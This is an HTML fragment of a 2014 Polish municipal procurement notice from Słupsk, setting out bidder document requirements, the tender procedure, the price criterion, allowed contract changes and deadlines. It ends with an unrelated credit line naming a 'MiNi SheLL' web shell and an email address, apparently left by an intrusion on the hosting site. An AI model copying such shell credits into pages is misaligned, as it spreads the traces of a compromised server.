<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmian postanowień  umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy,dotyczących:1) zmiany zakresu przedmiotu zamówienia w przypadku wystąpienia robót dodatkowych, których nie dało się przewidzieć na dzień zawarcia umowy, a które są niezbędne do wykonania zamówienia, 2)zmiany terminu realizacji zamówienia  w przypadku:a)wystąpienia zamówień dodatkowych, których wykonanie jest niezbędne do finalizacji zamówienia będącego przedmiotem umowy, a czas realizacji zamówień dodatkowych nie pozwala na wykonanie w terminie umownym przedmiotu zamówienia,b)wystąpienia siły wyższej (np. powódź); pod pojęciem siły wyższej Zamawiający rozumieć będzie zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy i którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, występujące po podpisaniu umowy i powodujące niemożność wywiązania się z umowy w jej obecnym brzmieniu; w takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno minimum tyle dni ile trwa opóźnienie spowodowane powyższymi okolicznościami,3) zmiany wynagrodzenia w przypadku zmiany w trakcie realizacji zamówienia powszechnie obowiązujących przepisów prawa Unii  Europejskiej lub prawa krajowego, w zakresie mającym wpływ na realizację przedmiotu  zamówienia, w tym zmiany ustawowej stawki podatku od towarów i usług VAT,4) zmiany osób wskazanych w umowie zarówno po stronie Zamawiającego, w tym inspektorów nadzoru, jak i po stronie Wykonawcy, w tym kierownika budowy/robót, z zastrzeżeniem,  że proponowane osoby posiadają takie same lub wyższe uprawnienia i kwalifikacje od wymaganych w postanowieniach SIWZ,
5) zmiany zakresu robót, które Wykonawca będzie prowadził sam i przy pomocy podwykonawców,6)zmiany podmiotów trzecich na etapie realizacji zamówienia, na zasobach których Wykonawca opierał się wskazując spełnianie warunków udziału w postępowaniu, z zastrzeżeniem, że spełnione są warunki udziału w postepowaniu określone w SIWZ,7) rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć  w inny sposób, a zmiana będzie umożliwiać wyjaśnienie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,8) innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
2.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego, lub przez Wykonawcę.3.Warunkiem dokonania zmian, o których mowa jest złożenie wniosku uzasadniającego konieczność dokonania zmian w przedmiotowej umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:/www.zimslupsk.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Infrastruktury Miejskiej w Słupsku, 76-200 Słupsk, ul.Przemysłowa 73.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 10:00, miejsce: Zarząd Infrastruktury Miejskiej w Słupsku, ul. Przemysłowa 73, 76-200 Słupsk- pok. nr 101 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na realizację zamówienia Zamawiający planuje uzyskać dofinansowanie ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com